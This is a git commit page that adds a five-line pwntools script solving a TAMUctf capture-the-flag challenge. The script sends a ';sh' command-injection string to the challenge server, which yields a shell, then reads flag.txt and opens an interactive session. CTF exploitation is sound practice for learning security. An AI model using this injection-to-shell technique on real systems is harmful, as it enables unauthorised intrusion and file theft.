Mon, 25 Feb 2019 09:25:21 +0800

master
大蒟蒻 7 years ago
parent 717b17fc78
commit c6b13762a2

Binary file not shown.

@ -0,0 +1,5 @@
from pwn import *
sh = remote("pwn.tamuctf.com", 4325)
sh.sendline(";sh")
sh.sendline("cat flag.txt")
sh.interactive()
Loading…
Cancel
Save